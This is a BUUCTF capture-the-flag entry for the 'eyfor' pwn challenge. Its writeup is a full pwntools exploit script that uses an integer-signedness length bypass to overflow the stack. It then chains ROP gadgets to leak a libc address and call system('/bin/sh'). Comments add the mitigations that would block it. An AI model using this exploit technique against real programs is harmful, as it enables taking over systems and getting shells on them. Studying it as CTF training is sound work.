| ID: | 6458 |
|---|---|
| 标题: | [DASCTF2022.07赋能赛]eyfor |
| 描述: | None |
| 类型: | Pwn |
| 网站: | BUUCTF |
| 题目链接: | https://buuoj.cn/challenges#[DASCTF2022.07赋能赛]eyfor |
| 赛事: | DASCTF2022.07赋能赛 |
| 年度: | 2022 |
| Flag值: | 无 |
| writeup: |
from pwn import *

# Solution script for the "eyfor" pwn challenge, run against a local copy of
# the binary. It is a two-stage return-to-libc: stage one leaks the runtime
# address of puts, stage two reuses that leak to call system("/bin/sh").
#
# NOTE(review): the script relies on hard-coded code addresses and overwrites
# the saved return address directly, so the target was presumably built
# without PIE and without a stack canary on this path -- confirm with a
# checksec-style inspection. Building with -fstack-protector-strong and -pie
# and bounding the length as an unsigned value would break both stages.

context(log_level='debug', arch='amd64', os='linux')

io = process('./eyfor')
#io = remote('node5.buuoj.cn',26262)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
elf = ELF('./eyfor')

# Fixed addresses taken from the challenge binary.
POP_RDI_RET = 0x0000000000400983
# One byte past the gadget above; presumably a bare `ret` used to keep the
# stack 16-byte aligned before entering system -- TODO confirm.
RET_ONLY = POP_RDI_RET + 1
# Presumably re-enters the vulnerable input path so a second payload can be
# sent in the same process -- TODO confirm against the disassembly.
REENTRY_ADDR = 0x4007B7
# Filler up to the saved return address (offset used by the original script).
PADDING = b'a' * 0x38

# Walk through the program's prompts.
io.sendlineafter('go', 'a')
for _ in range(4):
    io.sendlineafter('message:', '1')

# 4294967220 == 2**32 - 76, i.e. -76 when read as a signed 32-bit integer.
# NOTE(review): presumably this slips past a signed length check and is then
# used as a large unsigned read size -- verify in the binary. The fix on the
# program side is to parse the length as unsigned and enforce an upper bound.
io.sendline('4294967220')
io.recvline()

# Stage 1: puts(puts@got) to disclose a libc pointer, then return into the
# program again.
leak_chain = (
    p64(POP_RDI_RET),
    p64(elf.got['puts']),
    p64(elf.plt['puts']),
    p64(REENTRY_ADDR),
)
io.send(PADDING + b''.join(leak_chain))

# Skip program output up to the 'CST\n' marker, then read the 6 leaked
# address bytes and zero-extend them to a full 64-bit little-endian value.
io.recvuntil('CST\n')
raw_leak = io.recv(6)
leaked_puts = u64(raw_leak.ljust(8, b'\x00'))

# Rebase the needed libc symbols on the leaked puts address.
libc_delta = leaked_puts - libc.sym['puts']
system_addr = libc_delta + libc.sym['system']
binsh_addr = libc_delta + next(libc.search('/bin/sh'))

# Stage 2: system("/bin/sh") with an extra ret in front of the call chain.
shell_chain = (
    p64(RET_ONLY),
    p64(POP_RDI_RET),
    p64(binsh_addr),
    p64(system_addr),
)
io.send(PADDING + b''.join(shell_chain))

io.interactive()